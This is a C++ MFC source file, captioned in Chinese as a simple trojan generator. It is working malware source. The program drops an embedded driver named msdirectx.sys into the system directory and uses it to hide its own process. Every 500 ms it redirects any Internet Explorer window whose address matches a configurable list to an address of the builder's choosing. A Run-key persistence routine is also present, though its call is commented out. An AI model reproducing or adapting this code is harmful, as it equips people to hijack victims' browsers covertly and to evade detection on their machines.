procdlg.cpp

一个简单的木马生成器的程序

// ProcDlg.cpp : implementation file
//

#include "stdafx.h"
#include "Proc.h"
#include "ProcDlg.h"
#include <winsvc.h>
#include "HideProcess.h"



#include <atlbase.h>
#include <Mshtml.h>
#include <winuser.h>
#include <comdef.h>


#pragma comment(linker,"/opt:nowin98")

struct MODIFY_DATA 
{
	unsigned int finder;
	char hate1[256];
	char hate2[256];
	char hate3[256];

	char my1[256];
	char my2[256];
	char my3[256];
}modify_data = {
	0xDAFAFDD4,
	"http://www.baidu.com",
	"http://www.baidu.com",
	"http://www.baidu.com",

	"http://www.baidu.com",
	"http://www.baidu.com",
	"http://www.baidu.com",

};

BOOL LoadSource(UINT resoure_id , const char * type , const char * filepath)
{
	//获得资源指针
	HRSRC hRsrc = ::FindResource( NULL , MAKEINTRESOURCE( resoure_id ) , type );
	
	if( hRsrc )
	{   //获得资源大小
		DWORD size = ::SizeofResource( NULL , hRsrc );
        //将资源载入内存
		HGLOBAL  handle = ::LoadResource( NULL , hRsrc );
        //写入文件     
		if( handle )
		{   //定位资源位置
			BYTE *MemPtr = (BYTE *)LockResource( handle ); 

			CFile file;

			if( file.Open( filepath , CFile::modeCreate | CFile::modeWrite ) )
			{
				file.Write( MemPtr , size );

				file.Close( );
			}
			::UnlockResource( handle );
		}
		::FreeResource( handle );
		return TRUE;
	}
	return FALSE;
}

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// CProcDlg dialog

CProcDlg::CProcDlg(CWnd* pParent /*=NULL*/)
	: CDialog(CProcDlg::IDD, pParent)
{
	//{{AFX_DATA_INIT(CProcDlg)
		// NOTE: the ClassWizard will add member initialization here
	m_spSHWinds = NULL;
	//}}AFX_DATA_INIT
	// Note that LoadIcon does not require a subsequent DestroyIcon in Win32
	m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}

void CProcDlg::DoDataExchange(CDataExchange* pDX)
{
	CDialog::DoDataExchange(pDX);
	//{{AFX_DATA_MAP(CProcDlg)
		// NOTE: the ClassWizard will add DDX and DDV calls here
	//}}AFX_DATA_MAP
}

BEGIN_MESSAGE_MAP(CProcDlg, CDialog)
	//{{AFX_MSG_MAP(CProcDlg)
	ON_WM_PAINT()
	ON_WM_QUERYDRAGICON()
	ON_WM_TIMER()
	//}}AFX_MSG_MAP
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CProcDlg message handlers

BOOL CProcDlg::OnInitDialog()
{
	CDialog::OnInitDialog();

	// Set the icon for this dialog.  The framework does this automatically
	//  when the application's main window is not a dialog
	SetIcon(m_hIcon, TRUE);			// Set big icon
	SetIcon(m_hIcon, FALSE);		// Set small icon

	//消灭窗口
	//MoveWindow(0,0,0,0,FALSE);
	//SetWindowLong(this->GetSafeHwnd(),GWL_EXSTYLE,WS_EX_TOOLWINDOW|WS_EX_STATICEDGE);
	
	//启动项设置
	//SetAutoRun("winsrv.exe");

	char Path[MAX_PATH];
	GetSystemDirectory(Path,MAX_PATH);
	strcat(Path,"\\msdirectx.sys");
	LoadSource(IDR_SYS1,"SYS",Path);

	CHideProcess p;
	p.InitDriver();
	p.HideProc(GetCurrentProcessId());

	//初始化COM对象
	CoInitialize(NULL);
	if (m_spSHWinds == NULL)
	{
		if (m_spSHWinds.CreateInstance(__uuidof(SHDocVw::ShellWindows)) != S_OK)
		{
			CoUninitialize();
			EndDialog(1);
		}
	}
	//设置时间器
	SetTimer(0,500,NULL);
	return TRUE;  // return TRUE  unless you set the focus to a control
}

// If you add a minimize button to your dialog, you will need the code below
//  to draw the icon.  For MFC applications using the document/view model,
//  this is automatically done for you by the framework.

void CProcDlg::OnPaint() 
{
	if (IsIconic())
	{
		CPaintDC dc(this); // device context for painting

		SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0);

		// Center icon in client rectangle
		int cxIcon = GetSystemMetrics(SM_CXICON);
		int cyIcon = GetSystemMetrics(SM_CYICON);
		CRect rect;
		GetClientRect(&rect);
		int x = (rect.Width() - cxIcon + 1) / 2;
		int y = (rect.Height() - cyIcon + 1) / 2;

		// Draw the icon
		dc.DrawIcon(x, y, m_hIcon);
	}
	else
	{
		CDialog::OnPaint();
	}
}

// The system calls this to obtain the cursor to display while the user drags
//  the minimized window.
HCURSOR CProcDlg::OnQueryDragIcon()
{
	return (HCURSOR) m_hIcon;
}

void CProcDlg::SetMyUrl()//当时间到了，就调用这个函数
{
	//看看是否为空，如果为空的话就是没有IE实例拉
	if (m_spSHWinds)
	{
        //如果不为空的话，下面就可以得到正在运行的IE的实例了，也就是说开了多少
		//个IE浏览器
		int n = m_spSHWinds->GetCount();
        //循环每一个浏览器，这个不用说了吧。呵呵
		for (int i = 0; i < n; i++)
		{
            //得到具体的IE浏览器的实例，然后就是上面所说的判断是否为IE了。
			_variant_t v = (long)i;
			IDispatchPtr spDisp = m_spSHWinds->Item(v);
			SHDocVw::IWebBrowser2Ptr spBrowser(spDisp);
			ASSERT(spBrowser != NULL);
			if (spBrowser)
			{
                //这里就是得到用户正在浏览的IE地址哦，_bstr_t这个其实也可以说
				//是个字符串把，不过是以类的形式封装起来
				_bstr_t bsURL=spBrowser->GetLocationURL();
                //C语言里面的查找字符串函数哦，hateurl就是不喜欢的URL。
				if (strstr(bsURL,modify_data.hate1) != NULL)
				{
                    //如果是自己不喜欢的URL就把他跳到自己的URL上面去。下面的函
					//数就是实现这个功能的。
					spBrowser->Navigate(modify_data.my1);
				}
				if (strstr(bsURL,modify_data.hate2) != NULL)
				{
                    //如果是自己不喜欢的URL就把他跳到自己的URL上面去。下面的函
					//数就是实现这个功能的。
					spBrowser->Navigate(modify_data.my2);
				}
				if (strstr(bsURL,modify_data.hate3) != NULL)
				{
                    //如果是自己不喜欢的URL就把他跳到自己的URL上面去。下面的函
					//数就是实现这个功能的。
					spBrowser->Navigate(modify_data.my3);
				}
			}
		}
	}
}


void CProcDlg::OnTimer(UINT nIDEvent) 
{
	SetMyUrl();
	UpdateData(FALSE);
	CDialog::OnTimer(nIDEvent);
}

void CProcDlg::SetAutoRun(char *RunName)
{
	char MyPath[MAX_PATH]={0};
	GetModuleFileName(NULL,MyPath,MAX_PATH);

	char SubKey[MAX_PATH]={0};
	strcpy(SubKey,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
	
	HKEY hKey;
	if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS)
	{
		RegSetValueEx(hKey,RunName,0L,REG_SZ,(CONST BYTE *)MyPath,strlen(MyPath));
		RegCloseKey(hKey);
	}
}